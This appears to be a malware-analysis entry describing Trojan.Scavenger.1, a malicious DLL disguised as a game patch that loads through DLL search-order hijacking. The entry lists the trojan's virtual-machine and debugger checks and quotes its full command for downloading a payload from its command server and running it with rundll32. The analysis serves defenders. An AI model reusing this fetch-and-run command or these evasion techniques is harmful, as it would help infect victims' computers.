sha1:
- 60fca6ad18c8574f5234fdd47963d6fb9a6e113e (umpdc.dll)
Description
A malicious program written in C++ and a component of the Trojan.Scavenger family. It is distributed under the guise of patches and cheats for games and comes in the form of a dynamic library. Trojan.Scavenger.1 downloads another component of the family from the C2 server and launches it in the infected system. This component represents the next infection stage.
Operating routine
LaunchingFollowing the instructions provided by threat actors, potential victims manually copy the trojan’s DLL file into the directory of a legitimate program—allegedly to apply a “patch”. Trojan.Scavenger.1 has the system library name umpdc.dll, and, by exploiting the DLL Search Order Hijacking vulnerability, it launches as part of the target program.
Checking the running environmentWhen launched, Trojan.Scavenger.1 preliminarily performs an environment check, which is standard for the entire family. If it detects signs that it is being launched in a virtual environment or debug mode, the trojan stops working.
In addition to performing the standard steps, it also makes additional checks to determine whether:
-
The directory %TEMP%\SCVNGR_VM exists (an indication that the trojan is running in the SCVNGR test virtual environment of its creators). This check omits some of the steps from the standard procedure related to virtual machine verification. Malware writers use this mode to test the trojan in their own virtual environments.
-
The operation NtQuerySystemInformation(SystemExtendedHandleInformation) was successfully completed.
Trojan.Scavenger.1 executes the following command to download and run the payload on the target PC:
cmd /c curl hxxps[:]//ac7b2eda6f14[.]datahog[.]su/2w3e98t5zh298w3tzhg7982w3t4eg -o "%TEMP%\tmp6FC15.tmp" > NUL && move "%TEMP%\tmp6FC15.tmp" "%TEMP%\tmp6FC15.dll" && rundll32 "%TEMP%\tmp6FC15.dll",main
More about Trojan.Scavenger.2
News about the trojan
Indicators of compromise
